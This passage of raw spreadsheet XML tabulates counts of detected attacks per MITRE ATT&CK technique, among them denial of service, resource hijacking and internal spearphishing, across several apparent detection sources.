      </c>
      <c r="BE47" s="322" t="str">
        <f t="shared" si="8"/>
        <v>1 (1)</v>
      </c>
      <c r="BF47" s="12">
        <v>1</v>
      </c>
      <c r="BG47" s="13">
        <v>1</v>
      </c>
      <c r="BH47" s="394">
        <v>1</v>
      </c>
      <c r="BI47" s="292">
        <v>3</v>
      </c>
      <c r="BJ47" s="322">
        <v>2</v>
      </c>
      <c r="BK47" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (3)</v>
      </c>
      <c r="BL47" s="12">
        <v>2</v>
      </c>
      <c r="BM47" s="13">
        <v>1</v>
      </c>
      <c r="BN47" s="394">
        <v>1</v>
      </c>
      <c r="BO47" s="292">
        <v>10</v>
      </c>
      <c r="BP47" s="322">
        <v>9</v>
      </c>
      <c r="BQ47" s="322" t="str">
        <f t="shared" si="10"/>
        <v>9 (10)</v>
      </c>
      <c r="BR47" s="12">
        <v>2</v>
      </c>
      <c r="BS47" s="12">
        <v>4</v>
      </c>
      <c r="BT47" s="13">
        <v>1</v>
      </c>
      <c r="BU47" s="394">
        <v>8</v>
      </c>
      <c r="BV47" s="292">
        <v>0</v>
      </c>
      <c r="BW47" s="322">
        <v>0</v>
      </c>
      <c r="BX47" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY47" s="12">
        <v>0</v>
      </c>
      <c r="BZ47" s="13">
        <v>0</v>
      </c>
      <c r="CA47" s="394">
        <v>0</v>
      </c>
      <c r="CB47" s="292">
        <v>0</v>
      </c>
      <c r="CC47" s="322">
        <v>0</v>
      </c>
      <c r="CD47" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE47" s="12">
        <v>0</v>
      </c>
      <c r="CF47" s="12">
        <v>0</v>
      </c>
      <c r="CG47" s="13">
        <v>0</v>
      </c>
      <c r="CH47" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="48" spans="1:86" ht="15" customHeight="1">
      <c r="A48" s="4">
        <f t="shared" si="13"/>
        <v>46</v>
      </c>
      <c r="B48" s="4" t="str">
        <f>IFERROR(VLOOKUP(A48,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1496</v>
      </c>
      <c r="C48" s="493" t="str">
        <f>IFERROR(VLOOKUP(B48,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Resource Hijacking</v>
      </c>
      <c r="D48" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B48)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E48" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>12</v>
      </c>
      <c r="F48" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (12)</v>
      </c>
      <c r="G48" s="292">
        <v>0</v>
      </c>
      <c r="H48" s="322">
        <v>0</v>
      </c>
      <c r="I48" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J48" s="12">
        <v>0</v>
      </c>
      <c r="K48" s="13">
        <v>0</v>
      </c>
      <c r="L48" s="394">
        <v>0</v>
      </c>
      <c r="M48" s="322">
        <v>0</v>
      </c>
      <c r="N48" s="322">
        <v>0</v>
      </c>
      <c r="O48" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P48" s="12">
        <v>0</v>
      </c>
      <c r="Q48" s="13">
        <v>0</v>
      </c>
      <c r="R48" s="394">
        <v>0</v>
      </c>
      <c r="S48" s="409">
        <v>0</v>
      </c>
      <c r="T48" s="4">
        <v>0</v>
      </c>
      <c r="U48" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V48" s="4">
        <v>0</v>
      </c>
      <c r="W48" s="13">
        <v>0</v>
      </c>
      <c r="X48" s="394">
        <v>0</v>
      </c>
      <c r="Y48" s="392">
        <v>0</v>
      </c>
      <c r="Z48" s="392">
        <v>0</v>
      </c>
      <c r="AA48" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB48" s="392">
        <v>0</v>
      </c>
      <c r="AC48" s="16">
        <v>0</v>
      </c>
      <c r="AD48" s="394">
        <v>0</v>
      </c>
      <c r="AE48" s="392">
        <v>0</v>
      </c>
      <c r="AF48" s="392">
        <v>0</v>
      </c>
      <c r="AG48" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH48" s="392">
        <v>0</v>
      </c>
      <c r="AI48" s="16">
        <v>0</v>
      </c>
      <c r="AJ48" s="394">
        <v>0</v>
      </c>
      <c r="AK48" s="392">
        <v>0</v>
      </c>
      <c r="AL48" s="392">
        <v>0</v>
      </c>
      <c r="AM48" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="AN48" s="392">
        <v>0</v>
      </c>
      <c r="AO48" s="16">
        <v>0</v>
      </c>
      <c r="AP48" s="394">
        <v>0</v>
      </c>
      <c r="AQ48" s="292">
        <v>0</v>
      </c>
      <c r="AR48" s="322">
        <v>0</v>
      </c>
      <c r="AS48" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT48" s="12">
        <v>0</v>
      </c>
      <c r="AU48" s="13">
        <v>0</v>
      </c>
      <c r="AV48" s="394">
        <v>0</v>
      </c>
      <c r="AW48" s="392">
        <v>0</v>
      </c>
      <c r="AX48" s="392">
        <v>0</v>
      </c>
      <c r="AY48" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ48" s="4">
        <v>0</v>
      </c>
      <c r="BA48" s="16">
        <v>0</v>
      </c>
      <c r="BB48" s="394">
        <v>0</v>
      </c>
      <c r="BC48" s="292">
        <v>0</v>
      </c>
      <c r="BD48" s="322">
        <v>0</v>
      </c>
      <c r="BE48" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF48" s="12">
        <v>0</v>
      </c>
      <c r="BG48" s="13">
        <v>0</v>
      </c>
      <c r="BH48" s="394">
        <v>0</v>
      </c>
      <c r="BI48" s="292">
        <v>0</v>
      </c>
      <c r="BJ48" s="322">
        <v>0</v>
      </c>
      <c r="BK48" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL48" s="12">
        <v>0</v>
      </c>
      <c r="BM48" s="13">
        <v>0</v>
      </c>
      <c r="BN48" s="394">
        <v>0</v>
      </c>
      <c r="BO48" s="292">
        <v>11</v>
      </c>
      <c r="BP48" s="322">
        <v>8</v>
      </c>
      <c r="BQ48" s="322" t="str">
        <f t="shared" si="10"/>
        <v>8 (11)</v>
      </c>
      <c r="BR48" s="12">
        <v>0</v>
      </c>
      <c r="BS48" s="12">
        <v>4</v>
      </c>
      <c r="BT48" s="13">
        <v>1</v>
      </c>
      <c r="BU48" s="394">
        <v>8</v>
      </c>
      <c r="BV48" s="292">
        <v>0</v>
      </c>
      <c r="BW48" s="322">
        <v>0</v>
      </c>
      <c r="BX48" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY48" s="12">
        <v>0</v>
      </c>
      <c r="BZ48" s="13">
        <v>0</v>
      </c>
      <c r="CA48" s="394">
        <v>0</v>
      </c>
      <c r="CB48" s="292">
        <v>1</v>
      </c>
      <c r="CC48" s="322">
        <v>1</v>
      </c>
      <c r="CD48" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (1)</v>
      </c>
      <c r="CE48" s="12">
        <v>0</v>
      </c>
      <c r="CF48" s="12">
        <v>1</v>
      </c>
      <c r="CG48" s="13">
        <v>1</v>
      </c>
      <c r="CH48" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="49" spans="1:86" ht="15" customHeight="1">
      <c r="A49" s="4">
        <f t="shared" si="13"/>
        <v>47</v>
      </c>
      <c r="B49" s="4" t="str">
        <f>IFERROR(VLOOKUP(A49,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1498</v>
      </c>
      <c r="C49" s="493" t="str">
        <f>IFERROR(VLOOKUP(B49,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Network Denial of Service</v>
      </c>
      <c r="D49" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B49)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>8</v>
      </c>
      <c r="E49" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1432072</v>
      </c>
      <c r="F49" s="579" t="str">
        <f t="shared" si="14"/>
        <v>8 (1432072)</v>
      </c>
      <c r="G49" s="292">
        <v>21</v>
      </c>
      <c r="H49" s="322">
        <v>1</v>
      </c>
      <c r="I49" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (21)</v>
      </c>
      <c r="J49" s="12">
        <v>1</v>
      </c>
      <c r="K49" s="13">
        <v>0.125</v>
      </c>
      <c r="L49" s="394">
        <v>1</v>
      </c>
      <c r="M49" s="322">
        <v>0</v>
      </c>
      <c r="N49" s="322">
        <v>0</v>
      </c>
      <c r="O49" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P49" s="12">
        <v>0</v>
      </c>
      <c r="Q49" s="13">
        <v>0</v>
      </c>
      <c r="R49" s="394">
        <v>0</v>
      </c>
      <c r="S49" s="409">
        <v>21</v>
      </c>
      <c r="T49" s="4">
        <v>1</v>
      </c>
      <c r="U49" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (21)</v>
      </c>
      <c r="V49" s="4">
        <v>1</v>
      </c>
      <c r="W49" s="13">
        <v>0.125</v>
      </c>
      <c r="X49" s="394">
        <v>1</v>
      </c>
      <c r="Y49" s="392">
        <v>200383</v>
      </c>
      <c r="Z49" s="392">
        <v>163463</v>
      </c>
      <c r="AA49" s="322" t="str">
        <f t="shared" si="3"/>
        <v>163463 (200383)</v>
      </c>
      <c r="AB49" s="392">
        <v>2</v>
      </c>
      <c r="AC49" s="16">
        <v>0.25</v>
      </c>
      <c r="AD49" s="394">
        <v>163463</v>
      </c>
      <c r="AE49" s="392">
        <v>1</v>
      </c>
      <c r="AF49" s="392">
        <v>1</v>
      </c>
      <c r="AG49" s="322" t="str">
        <f t="shared" si="4"/>
        <v>1 (1)</v>
      </c>
      <c r="AH49" s="392">
        <v>1</v>
      </c>
      <c r="AI49" s="16">
        <v>0.125</v>
      </c>
      <c r="AJ49" s="394">
        <v>1</v>
      </c>
      <c r="AK49" s="392">
        <v>200384</v>
      </c>
      <c r="AL49" s="392">
        <v>163464</v>
      </c>
      <c r="AM49" s="322" t="str">
        <f t="shared" si="5"/>
        <v>163464 (200384)</v>
      </c>
      <c r="AN49" s="392">
        <v>3</v>
      </c>
      <c r="AO49" s="16">
        <v>0.25</v>
      </c>
      <c r="AP49" s="394">
        <v>163463</v>
      </c>
      <c r="AQ49" s="292">
        <v>0</v>
      </c>
      <c r="AR49" s="322">
        <v>0</v>
      </c>
      <c r="AS49" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT49" s="12">
        <v>0</v>
      </c>
      <c r="AU49" s="13">
        <v>0</v>
      </c>
      <c r="AV49" s="394">
        <v>0</v>
      </c>
      <c r="AW49" s="392">
        <v>0</v>
      </c>
      <c r="AX49" s="392">
        <v>0</v>
      </c>
      <c r="AY49" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ49" s="4">
        <v>0</v>
      </c>
      <c r="BA49" s="16">
        <v>0</v>
      </c>
      <c r="BB49" s="394">
        <v>0</v>
      </c>
      <c r="BC49" s="292">
        <v>21</v>
      </c>
      <c r="BD49" s="322">
        <v>1</v>
      </c>
      <c r="BE49" s="322" t="str">
        <f t="shared" si="8"/>
        <v>1 (21)</v>
      </c>
      <c r="BF49" s="12">
        <v>1</v>
      </c>
      <c r="BG49" s="13">
        <v>0.125</v>
      </c>
      <c r="BH49" s="394">
        <v>1</v>
      </c>
      <c r="BI49" s="292">
        <v>0</v>
      </c>
      <c r="BJ49" s="322">
        <v>0</v>
      </c>
      <c r="BK49" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL49" s="12">
        <v>0</v>
      </c>
      <c r="BM49" s="13">
        <v>0</v>
      </c>
      <c r="BN49" s="394">
        <v>0</v>
      </c>
      <c r="BO49" s="292">
        <v>167641</v>
      </c>
      <c r="BP49" s="322">
        <v>156822</v>
      </c>
      <c r="BQ49" s="322" t="str">
        <f t="shared" si="10"/>
        <v>156822 (167641)</v>
      </c>
      <c r="BR49" s="12">
        <v>0</v>
      </c>
      <c r="BS49" s="12">
        <v>8</v>
      </c>
      <c r="BT49" s="13">
        <v>0.875</v>
      </c>
      <c r="BU49" s="394">
        <v>156822</v>
      </c>
      <c r="BV49" s="292">
        <v>19669</v>
      </c>
      <c r="BW49" s="322">
        <v>19669</v>
      </c>
      <c r="BX49" s="322" t="str">
        <f t="shared" si="11"/>
        <v>19669 (19669)</v>
      </c>
      <c r="BY49" s="12">
        <v>1</v>
      </c>
      <c r="BZ49" s="13">
        <v>0.125</v>
      </c>
      <c r="CA49" s="394">
        <v>19669</v>
      </c>
      <c r="CB49" s="292">
        <v>1432046</v>
      </c>
      <c r="CC49" s="322">
        <v>1363309</v>
      </c>
      <c r="CD49" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1363309 (1432046)</v>
      </c>
      <c r="CE49" s="12">
        <v>0</v>
      </c>
      <c r="CF49" s="12">
        <v>2</v>
      </c>
      <c r="CG49" s="13">
        <v>0.25</v>
      </c>
      <c r="CH49" s="394">
        <v>1363309</v>
      </c>
    </row>
    <row r="50" spans="1:86" ht="15" customHeight="1">
      <c r="A50" s="4">
        <f t="shared" si="13"/>
        <v>48</v>
      </c>
      <c r="B50" s="4" t="str">
        <f>IFERROR(VLOOKUP(A50,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1499</v>
      </c>
      <c r="C50" s="493" t="str">
        <f>IFERROR(VLOOKUP(B50,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Endpoint Denial of Service</v>
      </c>
      <c r="D50" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B50)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>10</v>
      </c>
      <c r="E50" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2061420</v>
      </c>
      <c r="F50" s="579" t="str">
        <f t="shared" si="14"/>
        <v>10 (2061420)</v>
      </c>
      <c r="G50" s="292">
        <v>0</v>
      </c>
      <c r="H50" s="322">
        <v>0</v>
      </c>
      <c r="I50" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J50" s="12">
        <v>0</v>
      </c>
      <c r="K50" s="13">
        <v>0</v>
      </c>
      <c r="L50" s="394">
        <v>0</v>
      </c>
      <c r="M50" s="322">
        <v>1</v>
      </c>
      <c r="N50" s="322">
        <v>1</v>
      </c>
      <c r="O50" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="P50" s="12">
        <v>1</v>
      </c>
      <c r="Q50" s="13">
        <v>0.1</v>
      </c>
      <c r="R50" s="394">
        <v>1</v>
      </c>
      <c r="S50" s="409">
        <v>1</v>
      </c>
      <c r="T50" s="4">
        <v>1</v>
      </c>
      <c r="U50" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (1)</v>
      </c>
      <c r="V50" s="4">
        <v>1</v>
      </c>
      <c r="W50" s="13">
        <v>0.1</v>
      </c>
      <c r="X50" s="394">
        <v>1</v>
      </c>
      <c r="Y50" s="392">
        <v>368232</v>
      </c>
      <c r="Z50" s="392">
        <v>29367</v>
      </c>
      <c r="AA50" s="322" t="str">
        <f t="shared" si="3"/>
        <v>29367 (368232)</v>
      </c>
      <c r="AB50" s="392">
        <v>5</v>
      </c>
      <c r="AC50" s="16">
        <v>0.7</v>
      </c>
      <c r="AD50" s="394">
        <v>29120</v>
      </c>
      <c r="AE50" s="392">
        <v>1</v>
      </c>
      <c r="AF50" s="392">
        <v>1</v>
      </c>
      <c r="AG50" s="322" t="str">
        <f t="shared" si="4"/>
        <v>1 (1)</v>
      </c>
      <c r="AH50" s="392">
        <v>1</v>
      </c>
      <c r="AI50" s="16">
        <v>0.1</v>
      </c>
      <c r="AJ50" s="394">
        <v>1</v>
      </c>
      <c r="AK50" s="392">
        <v>368233</v>
      </c>
      <c r="AL50" s="392">
        <v>29368</v>
      </c>
      <c r="AM50" s="322" t="str">
        <f t="shared" si="5"/>
        <v>29368 (368233)</v>
      </c>
      <c r="AN50" s="392">
        <v>6</v>
      </c>
      <c r="AO50" s="16">
        <v>0.7</v>
      </c>
      <c r="AP50" s="394">
        <v>29121</v>
      </c>
      <c r="AQ50" s="292">
        <v>0</v>
      </c>
      <c r="AR50" s="322">
        <v>0</v>
      </c>
      <c r="AS50" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT50" s="12">
        <v>0</v>
      </c>
      <c r="AU50" s="13">
        <v>0</v>
      </c>
      <c r="AV50" s="394">
        <v>0</v>
      </c>
      <c r="AW50" s="392">
        <v>658</v>
      </c>
      <c r="AX50" s="392">
        <v>612</v>
      </c>
      <c r="AY50" s="322" t="str">
        <f t="shared" si="7"/>
        <v>612 (658)</v>
      </c>
      <c r="AZ50" s="4">
        <v>2</v>
      </c>
      <c r="BA50" s="16">
        <v>0.3</v>
      </c>
      <c r="BB50" s="394">
        <v>612</v>
      </c>
      <c r="BC50" s="292">
        <v>659</v>
      </c>
      <c r="BD50" s="322">
        <v>613</v>
      </c>
      <c r="BE50" s="322" t="str">
        <f t="shared" si="8"/>
        <v>613 (659)</v>
      </c>
      <c r="BF50" s="12">
        <v>3</v>
      </c>
      <c r="BG50" s="13">
        <v>0.3</v>
      </c>
      <c r="BH50" s="394">
        <v>613</v>
      </c>
      <c r="BI50" s="292">
        <v>4</v>
      </c>
      <c r="BJ50" s="322">
        <v>3</v>
      </c>
      <c r="BK50" s="322" t="str">
        <f t="shared" si="9"/>
        <v>3 (4)</v>
      </c>
      <c r="BL50" s="12">
        <v>1</v>
      </c>
      <c r="BM50" s="13">
        <v>0.1</v>
      </c>
      <c r="BN50" s="394">
        <v>3</v>
      </c>
      <c r="BO50" s="292">
        <v>182791</v>
      </c>
      <c r="BP50" s="322">
        <v>182788</v>
      </c>
      <c r="BQ50" s="322" t="str">
        <f t="shared" si="10"/>
        <v>182788 (182791)</v>
      </c>
      <c r="BR50" s="12">
        <v>1</v>
      </c>
      <c r="BS50" s="12">
        <v>9</v>
      </c>
      <c r="BT50" s="13">
        <v>0.5</v>
      </c>
      <c r="BU50" s="394">
        <v>182682</v>
      </c>
      <c r="BV50" s="292">
        <v>28</v>
      </c>
      <c r="BW50" s="322">
        <v>28</v>
      </c>
      <c r="BX50" s="322" t="str">
        <f t="shared" si="11"/>
        <v>28 (28)</v>
      </c>
      <c r="BY50" s="12">
        <v>2</v>
      </c>
      <c r="BZ50" s="13">
        <v>0.2</v>
      </c>
      <c r="CA50" s="394">
        <v>28</v>
      </c>
      <c r="CB50" s="292">
        <v>1839945</v>
      </c>
      <c r="CC50" s="322">
        <v>1116270</v>
      </c>
      <c r="CD50" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1116270 (1839945)</v>
      </c>
      <c r="CE50" s="12">
        <v>0</v>
      </c>
      <c r="CF50" s="12">
        <v>2</v>
      </c>
      <c r="CG50" s="13">
        <v>0.5</v>
      </c>
      <c r="CH50" s="394">
        <v>1116270</v>
      </c>
    </row>
    <row r="51" spans="1:86" ht="15" customHeight="1">
      <c r="A51" s="4">
        <f t="shared" si="13"/>
        <v>49</v>
      </c>
      <c r="B51" s="4" t="str">
        <f>IFERROR(VLOOKUP(A51,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1505</v>
      </c>
      <c r="C51" s="493" t="str">
        <f>IFERROR(VLOOKUP(B51,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Server Software Component</v>
      </c>
      <c r="D51" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B51)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E51" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F51" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (3)</v>
      </c>
      <c r="G51" s="292">
        <v>0</v>
      </c>
      <c r="H51" s="322">
        <v>0</v>
      </c>
      <c r="I51" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J51" s="12">
        <v>0</v>
      </c>
      <c r="K51" s="13">
        <v>0</v>
      </c>
      <c r="L51" s="394">
        <v>0</v>
      </c>
      <c r="M51" s="322">
        <v>0</v>
      </c>
      <c r="N51" s="322">
        <v>0</v>
      </c>
      <c r="O51" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P51" s="12">
        <v>0</v>
      </c>
      <c r="Q51" s="13">
        <v>0</v>
      </c>
      <c r="R51" s="394">
        <v>0</v>
      </c>
      <c r="S51" s="409">
        <v>0</v>
      </c>
      <c r="T51" s="4">
        <v>0</v>
      </c>
      <c r="U51" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V51" s="4">
        <v>0</v>
      </c>
      <c r="W51" s="13">
        <v>0</v>
      </c>
      <c r="X51" s="394">
        <v>0</v>
      </c>
      <c r="Y51" s="392">
        <v>0</v>
      </c>
      <c r="Z51" s="392">
        <v>0</v>
      </c>
      <c r="AA51" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB51" s="392">
        <v>0</v>
      </c>
      <c r="AC51" s="16">
        <v>0</v>
      </c>
      <c r="AD51" s="394">
        <v>0</v>
      </c>
      <c r="AE51" s="392">
        <v>1</v>
      </c>
      <c r="AF51" s="392">
        <v>1</v>
      </c>
      <c r="AG51" s="322" t="str">
        <f t="shared" si="4"/>
        <v>1 (1)</v>
      </c>
      <c r="AH51" s="392">
        <v>1</v>
      </c>
      <c r="AI51" s="16">
        <v>1</v>
      </c>
      <c r="AJ51" s="394">
        <v>1</v>
      </c>
      <c r="AK51" s="392">
        <v>1</v>
      </c>
      <c r="AL51" s="392">
        <v>1</v>
      </c>
      <c r="AM51" s="322" t="str">
        <f t="shared" si="5"/>
        <v>1 (1)</v>
      </c>
      <c r="AN51" s="392">
        <v>1</v>
      </c>
      <c r="AO51" s="16">
        <v>1</v>
      </c>
      <c r="AP51" s="394">
        <v>1</v>
      </c>
      <c r="AQ51" s="292">
        <v>0</v>
      </c>
      <c r="AR51" s="322">
        <v>0</v>
      </c>
      <c r="AS51" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT51" s="12">
        <v>0</v>
      </c>
      <c r="AU51" s="13">
        <v>0</v>
      </c>
      <c r="AV51" s="394">
        <v>0</v>
      </c>
      <c r="AW51" s="392">
        <v>0</v>
      </c>
      <c r="AX51" s="392">
        <v>0</v>
      </c>
      <c r="AY51" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ51" s="4">
        <v>0</v>
      </c>
      <c r="BA51" s="16">
        <v>0</v>
      </c>
      <c r="BB51" s="394">
        <v>0</v>
      </c>
      <c r="BC51" s="292">
        <v>0</v>
      </c>
      <c r="BD51" s="322">
        <v>0</v>
      </c>
      <c r="BE51" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF51" s="12">
        <v>0</v>
      </c>
      <c r="BG51" s="13">
        <v>0</v>
      </c>
      <c r="BH51" s="394">
        <v>0</v>
      </c>
      <c r="BI51" s="292">
        <v>0</v>
      </c>
      <c r="BJ51" s="322">
        <v>0</v>
      </c>
      <c r="BK51" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL51" s="12">
        <v>0</v>
      </c>
      <c r="BM51" s="13">
        <v>0</v>
      </c>
      <c r="BN51" s="394">
        <v>0</v>
      </c>
      <c r="BO51" s="292">
        <v>2</v>
      </c>
      <c r="BP51" s="322">
        <v>2</v>
      </c>
      <c r="BQ51" s="322" t="str">
        <f t="shared" si="10"/>
        <v>2 (2)</v>
      </c>
      <c r="BR51" s="12">
        <v>0</v>
      </c>
      <c r="BS51" s="12">
        <v>1</v>
      </c>
      <c r="BT51" s="13">
        <v>1</v>
      </c>
      <c r="BU51" s="394">
        <v>2</v>
      </c>
      <c r="BV51" s="292">
        <v>0</v>
      </c>
      <c r="BW51" s="322">
        <v>0</v>
      </c>
      <c r="BX51" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY51" s="12">
        <v>0</v>
      </c>
      <c r="BZ51" s="13">
        <v>0</v>
      </c>
      <c r="CA51" s="394">
        <v>0</v>
      </c>
      <c r="CB51" s="292">
        <v>3</v>
      </c>
      <c r="CC51" s="322">
        <v>2</v>
      </c>
      <c r="CD51" s="322" t="str">
        <f t="shared" si="12"/>
        <v>2 (3)</v>
      </c>
      <c r="CE51" s="12">
        <v>0</v>
      </c>
      <c r="CF51" s="12">
        <v>1</v>
      </c>
      <c r="CG51" s="13">
        <v>1</v>
      </c>
      <c r="CH51" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="52" spans="1:86" ht="15" customHeight="1">
      <c r="A52" s="4">
        <f t="shared" si="13"/>
        <v>50</v>
      </c>
      <c r="B52" s="4" t="str">
        <f>IFERROR(VLOOKUP(A52,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1534</v>
      </c>
      <c r="C52" s="493" t="str">
        <f>IFERROR(VLOOKUP(B52,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Internal Spearphishing</v>
      </c>
      <c r="D52" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B52)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E52" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>10</v>
      </c>
      <c r="F52" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (10)</v>
      </c>
      <c r="G52" s="292">
        <v>0</v>
      </c>
      <c r="H52" s="322">
        <v>0</v>
      </c>
      <c r="I52" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J52" s="12">
        <v>0</v>
      </c>
      <c r="K52" s="13">
        <v>0</v>
      </c>
      <c r="L52" s="394">
        <v>0</v>
      </c>
      <c r="M52" s="322">
        <v>0</v>
      </c>
      <c r="N52" s="322">
        <v>0</v>
      </c>
      <c r="O52" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P52" s="12">
        <v>0</v>
      </c>
      <c r="Q52" s="13">
        <v>0</v>
      </c>
      <c r="R52" s="394">
        <v>0</v>
      </c>
      <c r="S52" s="409">
        <v>0</v>
      </c>
      <c r="T52" s="4">
        <v>0</v>
      </c>
      <c r="U52" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V52" s="4">
        <v>0</v>
      </c>
      <c r="W52" s="13">
        <v>0</v>
      </c>
      <c r="X52" s="394">
        <v>0</v>
      </c>
      <c r="Y52" s="392">
        <v>17</v>
      </c>
      <c r="Z52" s="392">
        <v>3</v>
      </c>
      <c r="AA52" s="322" t="str">
        <f t="shared" si="3"/>
        <v>3 (17)</v>
      </c>
      <c r="AB52" s="392">
        <v>3</v>
      </c>
      <c r="AC52" s="16">
        <v>1</v>
      </c>
      <c r="AD52" s="394">
        <v>1</v>
      </c>
      <c r="AE52" s="392">
        <v>0</v>
      </c>
      <c r="AF52" s="392">
        <v>0</v>
      </c>
      <c r="AG52" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH52" s="392">
        <v>0</v>
      </c>
      <c r="AI52" s="16">
        <v>0</v>
      </c>
      <c r="AJ52" s="394">
        <v>0</v>
      </c>
      <c r="AK52" s="392">
        <v>17</v>
      </c>
      <c r="AL52" s="392">
        <v>3</v>
      </c>
      <c r="AM52" s="322" t="str">
        <f t="shared" si="5"/>
        <v>3 (17)</v>
      </c>
      <c r="AN52" s="392">
        <v>3</v>
      </c>
